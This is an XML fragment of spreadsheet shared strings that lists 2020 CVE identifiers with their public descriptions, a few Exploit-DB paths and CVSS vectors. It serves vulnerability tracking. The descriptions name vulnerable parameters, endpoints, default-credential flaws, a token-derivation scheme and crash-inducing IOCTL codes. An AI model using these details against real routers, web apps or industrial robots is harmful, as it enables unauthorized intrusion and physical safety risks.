  <si>
    <t>Command Injection in EntoneWebEngine in Amino Communications AK45x series, AK5xx series, AK65x series, Aria6xx series, Aria7/AK7Xx series and Kami7B allows authenticated remote attackers to execute arbitrary commands with root user privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10209</t>
  </si>
  <si>
    <t>Command Injection in the CPE WAN Management Protocol (CWMP) registration in Amino Communications AK45x series, AK5xx series, AK65x series, Aria6xx series, Aria7/AK7Xx series and Kami7B allows man-in-the-middle attackers to execute arbitrary commands with root level privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1021</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1082, CVE-2020-1088.</t>
  </si>
  <si>
    <t>CVE-2020-10210</t>
  </si>
  <si>
    <t>Because of hard-coded SSH keys for the root user in Amino Communications AK45x series, AK5xx series, AK65x series, Aria6xx series, Aria7/AK7Xx series, Kami7B, an attacker may remotely log in through SSH.</t>
  </si>
  <si>
    <t>CVE-2020-10211</t>
  </si>
  <si>
    <t>A remote code execution vulnerability in UCB component of Mitel MiVoice Connect before 19.1 SP1 could allow an unauthenticated remote attacker to execute arbitrary scripts due to insufficient validation of URL parameters. A successful exploit could allow an attacker to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-10212</t>
  </si>
  <si>
    <t>upload.php in Responsive FileManager 9.13.4 and 9.14.0 allows SSRF via the url parameter because file-extension blocking is mishandled and because it is possible for a DNS hostname to resolve to an internal IP address. For example, an SSRF attempt may succeed if a .ico filename is added to the PATH_INFO. Also, an attacker could create a DNS hostname that resolves to the 0.0.0.0 IP address for DNS pinning. NOTE: this issue exists because of an incomplete fix for CVE-2018-14728.</t>
  </si>
  <si>
    <t>CVE-2020-10213</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DIR-825 Rev.B 2.10 devices. They allow remote attackers to execute arbitrary commands via the wps_sta_enrollee_pin parameter in a set_sta_enrollee_pin.cgi POST request. TRENDnet TEW-632BRP 1.010B32 is also affected.</t>
  </si>
  <si>
    <t>CVE-2020-10214</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DIR-825 Rev.B 2.10 devices. There is a stack-based buffer overflow in the httpd binary. It allows an authenticated user to execute arbitrary code via a POST to ntp_sync.cgi with a sufficiently long parameter ntp_server.</t>
  </si>
  <si>
    <t>CVE-2020-10215</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DIR-825 Rev.B 2.10 devices. They allow remote attackers to execute arbitrary commands via the dns_query_name parameter in a dns_query.cgi POST request. TRENDnet TEW-632BRP 1.010B32 is also affected.</t>
  </si>
  <si>
    <t>CVE-2020-10216</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DIR-825 Rev.B 2.10 devices. They allow remote attackers to execute arbitrary commands via the date parameter in a system_time.cgi POST request. TRENDnet TEW-632BRP 1.010B32 is also affected.</t>
  </si>
  <si>
    <t>CVE-2020-10218</t>
  </si>
  <si>
    <t>A Blind SQL Injection issue was discovered in Sapplica Sentrifugo 3.2 via the index.php/holidaygroups/add id parameter because of the HolidaydatesController.php addAction function.</t>
  </si>
  <si>
    <t>CVE-2020-1022</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Dynamics Business Central, aka 'Dynamics Business Central Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48207.py</t>
  </si>
  <si>
    <t>rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-10220</t>
  </si>
  <si>
    <t>An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.</t>
  </si>
  <si>
    <t>CVE-2020-10221</t>
  </si>
  <si>
    <t>lib/ajaxHandlers/ajaxAddTemplate.php in rConfig through 3.94 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the fileName POST parameter.</t>
  </si>
  <si>
    <t>CVE-2020-10222</t>
  </si>
  <si>
    <t>npdf.dll in Nitro Pro before 13.13.2.242 is vulnerable to Heap Corruption at npdf!nitro::get_property+2381 via a crafted PDF document.</t>
  </si>
  <si>
    <t>CVE-2020-10223</t>
  </si>
  <si>
    <t>npdf.dll in Nitro Pro before 13.13.2.242 is vulnerable to JBIG2Decode CNxJBIG2DecodeStream Heap Corruption at npdf!CAPPDAnnotHandlerUtils::create_popup_for_markup+0x12fbe via a crafted PDF document.</t>
  </si>
  <si>
    <t>CVE-2020-10224</t>
  </si>
  <si>
    <t>An unauthenticated file upload vulnerability has been identified in admin_add.php in PHPGurukul Online Book Store 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.</t>
  </si>
  <si>
    <t>CVE-2020-10225</t>
  </si>
  <si>
    <t>An unauthenticated file upload vulnerability has been identified in admin/gallery.php in PHPGurukul Job Portal 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.</t>
  </si>
  <si>
    <t>CVE-2020-10227</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the messages module of vtecrm vtenext 19 CE allows attackers to inject arbitrary JavaScript code via the From field of an email.</t>
  </si>
  <si>
    <t>CVE-2020-10228</t>
  </si>
  <si>
    <t>A file upload vulnerability in vtecrm vtenext 19 CE allows authenticated users to upload files with a .pht extension, resulting in remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10229</t>
  </si>
  <si>
    <t>A CSRF issue in vtecrm vtenext 19 CE allows attackers to carry out unwanted actions on an administrator's behalf, such as uploading files, adding users, and deleting accounts.</t>
  </si>
  <si>
    <t>CVE-2020-1023</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1024, CVE-2020-1102.</t>
  </si>
  <si>
    <t>exploits/linux/webapps/48212.txt</t>
  </si>
  <si>
    <t>Centos WebPanel 7 - 'term' SQL Injection</t>
  </si>
  <si>
    <t>2020-03-13</t>
  </si>
  <si>
    <t>CVE-2020-10230</t>
  </si>
  <si>
    <t>CentOS-WebPanel.com (aka CWP) CentOS Web Panel (for CentOS 6 and 7) allows SQL Injection via the /cwp_{SESSION_HASH}/admin/loader_ajax.php term parameter.</t>
  </si>
  <si>
    <t>CVE-2020-10231</t>
  </si>
  <si>
    <t>TP-Link NC200 through 2.1.8_Build_171109, NC210 through 1.0.9_Build_171214, NC220 through 1.3.0_Build_180105, NC230 through 1.3.0_Build_171205, NC250 through 1.3.0_Build_171205, NC260 through 1.5.1_Build_190805, and NC450 through 1.5.0_Build_181022 devices allow a remote NULL Pointer Dereference.</t>
  </si>
  <si>
    <t>CVE-2020-10232</t>
  </si>
  <si>
    <t>In version 4.8.0 and earlier of The Sleuth Kit (TSK), there is a stack buffer overflow vulnerability in the YAFFS file timestamp parsing logic in yaffsfs_istat() in fs/yaffs.c.</t>
  </si>
  <si>
    <t>CVE-2020-10233</t>
  </si>
  <si>
    <t>In version 4.8.0 and earlier of The Sleuth Kit (TSK), there is a heap-based buffer over-read in ntfs_dinode_lookup in fs/ntfs.c.</t>
  </si>
  <si>
    <t>CVE-2020-10234</t>
  </si>
  <si>
    <t>The AscRegistryFilter.sys kernel driver in IObit Advanced SystemCare 13.2 allows an unprivileged user to send an IOCTL to the device driver. If the user provides a NULL entry for the dwIoControlCode parameter, a kernel panic (aka BSOD) follows. The IOCTL codes can be found in the dispatch function: 0x8001E000, 0x8001E004, 0x8001E008, 0x8001E00C, 0x8001E010, 0x8001E014, 0x8001E020, 0x8001E024, 0x8001E040, 0x8001E044, and 0x8001E048. \DosDevices\AscRegistryFilter and \Device\AscRegistryFilter are affected.</t>
  </si>
  <si>
    <t>CVE-2020-10235</t>
  </si>
  <si>
    <t>An issue was discovered in Froxlor before 0.10.14. Remote attackers with access to the installation routine could have executed arbitrary code via the database configuration options that were passed unescaped to exec, because of _backupExistingDatabase in install/lib/class.FroxlorInstall.php.</t>
  </si>
  <si>
    <t>CVE-2020-10236</t>
  </si>
  <si>
    <t>An issue was discovered in Froxlor before 0.10.14. It created files with static names in /tmp during installation if the installation directory was not writable. This allowed local attackers to cause DoS or disclose information out of the config files, because of _createUserdataConf in install/lib/class.FroxlorInstall.php.</t>
  </si>
  <si>
    <t>CVE-2020-10237</t>
  </si>
  <si>
    <t>An issue was discovered in Froxlor through 0.10.15. The installer wrote configuration parameters including passwords into files in /tmp, setting proper permissions only after writing the sensitive data. A local attacker could have disclosed the information if he read the file at the right time, because of _createUserdataConf in install/lib/class.FroxlorInstall.php.</t>
  </si>
  <si>
    <t>CVE-2020-10238</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.16. Various actions in com_templates lack the required ACL checks, leading to various potential attack vectors.</t>
  </si>
  <si>
    <t>CVE-2020-10239</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.16. Incorrect Access Control in the SQL fieldtype of com_fields allows access for non-superadmin users.</t>
  </si>
  <si>
    <t>CVE-2020-1024</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1102.</t>
  </si>
  <si>
    <t>CVE-2020-10240</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.16. Missing length checks in the user table can lead to the creation of users with duplicate usernames and/or email addresses.</t>
  </si>
  <si>
    <t>CVE-2020-10241</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.16. Missing token checks in the image actions of com_templates lead to CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-10242</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.16. Inadequate handling of CSS selectors in the Protostar and Beez3 JavaScript allows XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-10243</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! before 3.9.16. The lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the Featured Articles frontend menutype.</t>
  </si>
  <si>
    <t>CVE-2020-10244</t>
  </si>
  <si>
    <t>JPaseto before 0.3.0 generates weak hashes when using v2.local tokens.</t>
  </si>
  <si>
    <t>CVE-2020-10245</t>
  </si>
  <si>
    <t>CODESYS V3 web server before 3.5.15.40, as used in CODESYS Control runtime systems, has a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2020-10246</t>
  </si>
  <si>
    <t>MISP 2.4.122 has reflected XSS via unsanitized URL parameters. This is related to app/View/Users/statistics_orgs.ctp.</t>
  </si>
  <si>
    <t>CVE-2020-10247</t>
  </si>
  <si>
    <t>MISP 2.4.122 has Persistent XSS in the sighting popover tool. This is related to app/View/Elements/Events/View/sighting_field.ctp.</t>
  </si>
  <si>
    <t>CVE-2020-10248</t>
  </si>
  <si>
    <t>BWA DiREX-Pro 1.2181 devices allow remote attackers to discover passwords via a direct request to val_users.php3.</t>
  </si>
  <si>
    <t>CVE-2020-10249</t>
  </si>
  <si>
    <t>BWA DiREX-Pro 1.2181 devices allow full path disclosure via an invalid name array parameter to val_soft.php3.</t>
  </si>
  <si>
    <t>CVE-2020-1025</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation, aka 'Microsoft Office Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10250</t>
  </si>
  <si>
    <t>BWA DiREX-Pro 1.2181 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the PKG parameter to uninstall.php3.</t>
  </si>
  <si>
    <t>CVE-2020-10251</t>
  </si>
  <si>
    <t>In ImageMagick 7.0.9, an out-of-bounds read vulnerability exists within the ReadHEICImageByID function in coders\heic.c. It can be triggered via an image with a width or height value that exceeds the actual size of the image.</t>
  </si>
  <si>
    <t>CVE-2020-10252</t>
  </si>
  <si>
    <t>An issue was discovered in ownCloud before 10.4. Because of an SSRF issue (via the apps/files_sharing/external remote parameter), an authenticated attacker can interact with local services blindly (aka Blind SSRF) or conduct a Denial Of Service attack.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-10254</t>
  </si>
  <si>
    <t>An issue was discovered in ownCloud before 10.4. An attacker can bypass authentication on a password-protected image by displaying its preview.</t>
  </si>
  <si>
    <t>CVE-2020-10255</t>
  </si>
  <si>
    <t>Modern DRAM chips (DDR4 and LPDDR4 after 2015) are affected by a vulnerability in deployment of internal mitigations against RowHammer attacks known as Target Row Refresh (TRR), aka the TRRespass issue. To exploit this vulnerability, the attacker needs to create certain access patterns to trigger bit flips on affected memory modules, aka a Many-sided RowHammer attack. This means that, even when chips advertised as RowHammer-free are used, attackers may still be able to conduct privilege-escalation attacks against the kernel, conduct privilege-escalation attacks against the Sudo binary, and achieve cross-tenant virtual-machine access by corrupting RSA keys. The issue affects chips produced by SK Hynix, Micron, and Samsung. NOTE: tracking DRAM supply-chain issues is not straightforward because a single product model from a single vendor may use DRAM chips from different manufacturers.</t>
  </si>
  <si>
    <t>CVE-2020-10256</t>
  </si>
  <si>
    <t>An issue was discovered in beta versions of the 1Password command-line tool prior to 0.5.5 and in beta versions of the 1Password SCIM bridge prior to 0.7.3. An insecure random number generator was used to generate various keys. An attacker with access to the user's encrypted data may be able to perform brute-force calculations of encryption keys and thus succeed at decryption.</t>
  </si>
  <si>
    <t>CVE-2020-10257</t>
  </si>
  <si>
    <t>The ThemeREX Addons plugin before 2020-03-09 for WordPress lacks access control on the /trx_addons/v2/get/sc_layout REST API endpoint, allowing for PHP functions to be executed by any users, because includes/plugin.rest-api.php calls trx_addons_rest_get_sc_layout with an unsafe sc parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1026</t>
  </si>
  <si>
    <t>A Security Feature Bypass vulnerability exists in the MSR JavaScript Cryptography Library that is caused by multiple bugs in the libraryâ€™s Elliptic Curve Cryptography (ECC) implementation.An attacker could potentially abuse these bugs to learn information about a serverâ€™s private ECC key (a key leakage attack) or craft an invalid ECDSA signature that nevertheless passes as valid.The security update addresses the vulnerability by fixing the bugs disclosed in the ECC implementation, aka 'MSR JavaScript Cryptography Library Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10262</t>
  </si>
  <si>
    <t>An issue was discovered on XIAOMI XIAOAI speaker Pro LX06 1.58.10. Attackers can activate the failsafe mode during the boot process, and use the mi_console command cascaded by the SN code shown on the product to get the root shell password, and then the attacker can (i) read Wi-Fi SSID or password, (ii) read the dialogue text files between users and XIAOMI XIAOAI speaker Pro LX06, (iii) use Text-To-Speech tools pretend XIAOMI speakers' voice achieve social engineering attacks, (iv) eavesdrop on users and record what XIAOMI XIAOAI speaker Pro LX06 hears, (v) modify system files, (vi) use commands to send any IR code through IR emitter on XIAOMI XIAOAI Speaker Pro (LX06), (vii) stop voice assistant service, (viii) enable the XIAOMI XIAOAI Speaker Pro’s SSH or TELNET service as a backdoor, (IX) tamper with the router configuration of the router in the local area networks.</t>
  </si>
  <si>
    <t>CVE-2020-10263</t>
  </si>
  <si>
    <t>An issue was discovered on XIAOMI XIAOAI speaker Pro LX06 1.52.4. Attackers can get root shell by accessing the UART interface and then they can (i) read Wi-Fi SSID or password, (ii) read the dialogue text files between users and XIAOMI XIAOAI speaker Pro LX06, (iii) use Text-To-Speech tools pretend XIAOMI speakers' voice achieve social engineering attacks, (iv) eavesdrop on users and record what XIAOMI XIAOAI speaker Pro LX06 hears, (v) modify system files, (vi) use commands to send any IR code through IR emitter on XIAOMI XIAOAI Speaker Pro LX06, (vii) stop voice assistant service, (viii) enable the XIAOMI XIAOAI Speaker Pro’ SSH or TELNET service as a backdoor, (IX) tamper with the router configuration of the router in the local area networks.</t>
  </si>
  <si>
    <t>CVE-2020-10264</t>
  </si>
  <si>
    <t>CB3 SW Version 3.3 and upwards, e-series SW Version 5.0 and upwards allow authenticated access to the RTDE (Real-Time Data Exchange) interface on port 30004 which allows setting registers, the speed slider fraction as well as digital and analog Outputs. Additionally unautheticated reading of robot data is also possible</t>
  </si>
  <si>
    <t>CVE-2020-10265</t>
  </si>
  <si>
    <t>Universal Robots Robot Controllers Version CB2 SW Version 1.4 upwards, CB3 SW Version 3.0 and upwards, e-series SW Version 5.0 and upwards expose a service called DashBoard server at port 29999 that allows for control over core robot functions like starting/stopping programs, shutdown, reset safety and more. The DashBoard server is not protected by any kind of authentication or authorization.</t>
  </si>
  <si>
    <t>CVE-2020-10266</t>
  </si>
  <si>
    <t>UR+ (Universal Robots+) is a platform of hardware and software component sellers, for Universal Robots robots. When installing any of these components in the robots (e.g. in the UR10), no integrity checks are performed. Moreover, the SDK for making such components can be easily obtained from Universal Robots. An attacker could exploit this flaw by crafting a custom component with the SDK, performing Person-In-The-Middle attacks (PITM) and shipping the maliciously-crafted component on demand.</t>
  </si>
  <si>
    <t>CVE-2020-10267</t>
  </si>
  <si>
    <t>Universal Robots control box CB 3.1 across firmware versions (tested on 1.12.1, 1.12, 1.11 and 1.10) does not encrypt or protect in any way the intellectual property artifacts installed from the UR+ platform of hardware and software components (URCaps). These files (*.urcaps) are stored under '/root/.urcaps' as plain zip files containing all the logic to add functionality to the UR3, UR5 and UR10 robots. This flaw allows attackers with access to the robot or the robot network (while in combination with other flaws) to retrieve and easily exfiltrate all installed intellectual property.</t>
  </si>
  <si>
    <t>CVE-2020-10268</t>
  </si>
  <si>
    <t>Critical services for operation can be terminated from windows task manager, bringing the manipulator to a halt. After this a Re-Calibration of the brakes needs to be performed. Be noted that this only can be accomplished either by a Kuka technician or by Kuka issued calibration hardware that interfaces with the manipulator furthering the delay and increasing operational costs.</t>
  </si>
  <si>
    <t>CVE-2020-10269</t>
  </si>
  <si>
    <t>One of the wireless interfaces within MiR100, MiR200 and possibly (according to the vendor) other MiR fleet vehicles comes pre-configured in WiFi Master (Access Point) mode. Credentials to such wireless Access Point default to well known and widely spread SSID (MiR_RXXXX) and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. We have confirmed this flaw in MiR100 and MiR200 but it might also apply to MiR250, MiR500 and MiR1000.</t>
  </si>
  <si>
    <t>CVE-2020-1027</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.</t>
  </si>
  <si>
    <t>CVE-2020-10270</t>
  </si>
  <si>
    <t>Out of the wired and wireless interfaces within MiR100, MiR200 and other vehicles from the MiR fleet, it's possible to access the Control Dashboard on a hardcoded IP address. Credentials to such wireless interface default to well known and widely spread users (omitted) and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. This flaw allows cyber attackers to take control of the robot remotely and make use of the default user interfaces MiR has created, lowering the complexity of attacks and making them available to entry-level attackers. More elaborated attacks can also be established by clearing authentication and sending network requests directly. We have confirmed this flaw in MiR100 and MiR200 but according to the vendor, it might also apply to MiR250, MiR500 and MiR1000.</t>
  </si>
  <si>
    <t>CVE-2020-10271</t>
  </si>
  <si>
    <t>MiR100, MiR200 and other MiR robots use the Robot Operating System (ROS) default packages exposing the computational graph to all network interfaces, wireless and wired. This is the result of a bad set up and can be mitigated by appropriately configuring ROS and/or applying custom patches as appropriate. Currently, the ROS computational graph can be accessed fully from the wired exposed ports. In combination with other flaws such as CVE-2020-10269, the computation graph can also be fetched and interacted from wireless networks. This allows a malicious operator to take control of the ROS logic and correspondingly, the complete robot given that MiR's operations are centered around the framework (ROS).</t>
  </si>
  <si>
    <t>CVE-2020-10272</t>
  </si>
  <si>
    <t>MiR100, MiR200 and other MiR robots use the Robot Operating System (ROS) default packages exposing the computational graph without any sort of authentication. This allows attackers with access to the internal wireless and wired networks to take control of the robot seamlessly. In combination with CVE-2020-10269 and CVE-2020-10271, this flaw allows malicious actors to command the robot at desire.</t>
  </si>
  <si>
    <t>CVE-2020-10273</t>
  </si>
  <si>
    <t>MiR controllers across firmware versions 2.8.1.1 and before do not encrypt or protect in any way the intellectual property artifacts installed in the robots. This flaw allows attackers with access to the robot or the robot network (while in combination with other flaws) to retrieve and easily exfiltrate all installed intellectual property and data.</t>
  </si>
  <si>
    <t>CVE-2020-10274</t>
  </si>
  <si>
    <t>The access tokens for the REST API are directly derived (sha256 and base64 encoding) from the publicly available default credentials from the Control Dashboard (refer to CVE-2020-10270 for related flaws). This flaw in combination with CVE-2020-10273 allows any attacker connected to the robot networks (wired or wireless) to exfiltrate all stored data (e.g. indoor mapping images) and associated metadata from the robot's database.</t>
  </si>
  <si>
    <t>CVE-2020-10275</t>
  </si>
  <si>
    <t>The access tokens for the REST API are directly derived from the publicly available default credentials for the web interface. Given a USERNAME and a PASSWORD, the token string is generated directly with base64(USERNAME:sha256(PASSWORD)). An unauthorized attacker inside the network can use the default credentials to compute the token and interact with the REST API to exfiltrate, infiltrate or delete data.</t>
  </si>
  <si>
    <t>CVE-2020-10276</t>
  </si>
  <si>
    <t>The password for the safety PLC is the default and thus easy to find (in manuals, etc.). This allows a manipulated program to be uploaded to the safety PLC, effectively disabling the emergency stop in case an object is too close to the robot. Navigation and any other components dependent on the laser scanner are not affected (thus it is hard to detect before something happens) though the laser scanner configuration can also be affected altering further the safety of the device.</t>
  </si>
  <si>
    <t>CVE-2020-10277</t>
  </si>
  <si>
    <t>There is no mechanism in place to prevent a bad operator to boot from a live OS image, this can lead to extraction of sensible files (such as the shadow file) or privilege escalation by manually adding a new user with sudo privileges on the machine.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-10278</t>
  </si>
  <si>
    <t>The BIOS onboard MiR's Computer is not protected by password, therefore, it allows a Bad Operator to modify settings such as boot order. This can be leveraged by a Malicious operator to boot from a Live Image.</t>
  </si>
  <si>
    <t>CVE-2020-10279</t>
  </si>
  <si>
    <t>MiR robot controllers (central computation unit) makes use of Ubuntu 16.04.2 an operating system, Thought for desktop uses, this operating system presents insecure defaults for robots. These insecurities include a way for users to escalate their access beyond what they were granted via file creation, access race conditions, insecure home directory configurations and defaults that facilitate Denial of Service (DoS) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-1028</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1126, CVE-2020-1136, CVE-2020-1150.</t>
  </si>
  <si>
    <t>CVE-2020-10280</t>
  </si>
  <si>
    <t>The Apache server on port 80 that host the web interface is vulnerable to a DoS by spamming incomplete HTTP headers, effectively blocking the access to the dashboard.</t>
  </si>
  <si>
    <t>CVE-2020-10281</t>
  </si>
  <si>
    <t>This vulnerability applies to the Micro Air Vehicle Link (MAVLink) protocol and allows a remote attacker to gain access to sensitive information provided it has access to the communication medium. MAVLink is a header-based protocol that does not perform encryption to improve transfer (and reception speed) and efficiency by design. The increasing popularity of the protocol (used accross different autopilots) has led to its use in wired and wireless mediums through insecure communication channels exposing sensitive information to a remote attacker with ability to intercept network traffic.</t>
  </si>
  <si>
    <t>CVE-2020-10282</t>
  </si>
  <si>
    <t>The Micro Air Vehicle Link (MAVLink) protocol presents no authentication mechanism on its version 1.0 (nor authorization) whichs leads to a variety of attacks including identity spoofing, unauthorized access, PITM attacks and more. According to literature, version 2.0 optionally allows for package signing which mitigates this flaw. Another source mentions that MAVLink 2.0 only provides a simple authentication system based on HMAC. This implies that the flying system overall should add the same symmetric key into all devices of network. If not the case, this may cause a security issue, that if one of the devices and its symmetric key are compromised, the whole authentication system is not reliable.</t>
  </si>
  <si>
    <t>CVE-2020-10283</t>
  </si>
  <si>
    <t>The Micro Air Vehicle Link (MAVLink) protocol presents authentication mechanisms on its version 2.0 however according to its documentation, in order to maintain backwards compatibility, GCS and autopilot negotiate the version via the AUTOPILOT_VERSION message. Since this negotiation depends on the answer, an attacker may craft packages in a way that hints the autopilot to adopt version 1.0 of MAVLink for the communication. Given the lack of authentication capabilities in such version of MAVLink (refer to CVE-2020-10282), attackers may use this method to bypass authentication capabilities and interact with the autopilot directly.</t>
  </si>
  <si>
    <t>CVE-2020-10284</t>
  </si>
  <si>
    <t>No authentication is required to control the robot inside the network, moreso the latest available user manual shows an option that lets the user to add a password to the robot but as in xarm_studio 1.3.0 the option is missing from the menu. Assuming manual control, even by forcefully removing the current operator from an active session.</t>
  </si>
  <si>
    <t>CVE-2020-10285</t>
  </si>
  <si>
    <t>The authentication implementation on the xArm controller has very low entropy, making it vulnerable to a brute-force attack. There is no mechanism in place to mitigate or lockout automated attempts to gain access.</t>
  </si>
  <si>
    <t>CVE-2020-10286</t>
  </si>
  <si>
    <t>the main user account has restricted privileges but is in the sudoers group and there is not any mechanism in place to prevent sudo su or sudo -i to be run gaining unrestricted access to sensible files, encryption, or issue orders that disrupt robot operation.</t>
  </si>
  <si>
    <t>CVE-2020-10287</t>
  </si>
  <si>
    <t>The IRC5 family with UAS service enabled comes by default with credentials that can be found on publicly available manuals. ABB considers this a well documented functionality that helps customer set up however, out of our research, we found multiple production systems running these exact default credentials and consider thereby this an exposure that should be mitigated. Moreover, future deployments should consider that these defaults should be forbidden (user should be forced to change them).</t>
  </si>
  <si>
    <t>CVE-2020-10288</t>
  </si>
  <si>
    <t>IRC5 exposes an ftp server (port 21). Upon attempting to gain access you are challenged with a request of username and password, however you can input whatever you like. As long as the field isn't empty it will be accepted.</t>
  </si>
  <si>
    <t>CVE-2020-10289</t>
  </si>
  <si>
    <t>Use of unsafe yaml load. Allows instantiation of arbitrary objects. The flaw itself is caused by an unsafe parsing of YAML values which happens whenever an action message is processed to be sent, and allows for the creation of Python objects. Through this flaw in the ROS core package of actionlib, an attacker with local or remote access can make the ROS Master, execute arbitrary code in Python form. Consider yaml.safe_load() instead. Located first in actionlib/tools/library.py:132. See links for more info on the bug.</t>
  </si>
  <si>
    <t>CVE-2020-1029</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0942, CVE-2020-0944.</t>
  </si>
  <si>
    <t>CVE-2020-10290</t>
  </si>
  <si>
    <t>Universal Robots controller execute URCaps (zip files containing Java-powered applications) without any permission restrictions and a wide API that presents many primitives that can compromise the overall robot operations as demonstrated in our video. In our PoC we demonstrate how a malicious actor could 'cook' a custom URCap that when deployed by the user (intendedly or unintendedly) compromises the system</t>
  </si>
  <si>
    <t>CVE-2020-10291</t>
  </si>
  <si>
    <t>Visual Components (owned by KUKA) is a robotic simulator that allows simulating factories and robots in order toimprove planning and decision-making processes. Visual Components software requires a special license which can beobtained from a network license server. The network license server binds to all interfaces (0.0.0.0) and listensfor packets over UDP port 5093. No authentication/authorization is required in order to communicate with theserver. The protocol being used is a property protocol by RMS Sentinel which provides the licensing infrastructurefor the network license server. RMS Sentinel license manager service exposes UDP port 5093 which provides sensitivesystem information that could be leveraged for further exploitation without any kind of authentication. Thisinformation includes detailed hardware and OS characteristics.After a decryption process, a textual protocol is found which contains a simple header with the requested command,application-identifier, and some arguments. The protocol leaks information regarding the receiving serverinformation, license information and managing licenses, among others.Through this flaw, attackers can retreive information about a KUKA simulation system, particularly, the version ofthe licensing server, which is connected to the simulator, and which will allow them to launch local simulationswith similar characteristics, further understanding the dynamics of motion virtualization and opening doors toother attacks (see RVDP#711 and RVDP#712 for subsequent vulnerabilities that compromise integrity andavailability).Beyond compromising simulations, Visual Components provides capabilities to interface with industrial machinery.Particularly, their PLC Connectivity feature 'makes it easy' to connect simulations with control systems usingeither the industry standard OPC UA or other supported vendor specific interfaces. This fills the gap of jumpingfrom simulation to real and enables attackers to pivot from the Visual Components simulator to robots or otherIndustrial Control System (ICS) devices, such as PLCs.</t>
  </si>
  <si>
    <t>CVE-2020-10292</t>
  </si>
  <si>
    <t>Visual Components (owned by KUKA) is a robotic simulator that allows simulating factories and robots in order toimprove planning and decision-making processes. Visual Components software requires a special license which can beobtained from a network license server. The network license server binds to all interfaces (0.0.0.0) and listensfor packets over UDP port 5093. No authentication/authorization is required in order to communicate with theserver. The protocol being used is a property protocol by RMS Sentinel which provides the licensing infrastructurefor the network license server. RMS Sentinel license manager service exposes UDP port 5093 which provides sensitivesystem information that could be leveraged for further exploitation without any kind of authentication. Thisinformation includes detailed hardware and OS characteristics.After a decryption process, a textual protocol is found which contains a simple header with the requested command,application-identifier, and some arguments. The protocol is vulnerable to DoS through an arbitrary pointerderreference. This flaw allows an attacker to to pass a specially crafted package that, when processed by theservice, causes an arbitrary pointer from the stack to be dereferenced, causing an uncaught exception thatterminates the service. This can be further contructed in combination with RVDP#710 which exploits an informationdisclosure leak, or with RVDP#711 for an stack-overflow and potential code execution.Beyond denying simulations, Visual Components provides capabilities to interface with industrial machinery andautomate certain processes (e.g. testing, benchmarking, etc.) which depending on the DevOps setup might beintegrated into the industrial flow. Accordingly, a DoS in the simulation might have higher repercusions, dependingon the Industrial Control System (ICS) ICS infrastructure.</t>
  </si>
  <si>
    <t>CVE-2020-1030</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1031</t>
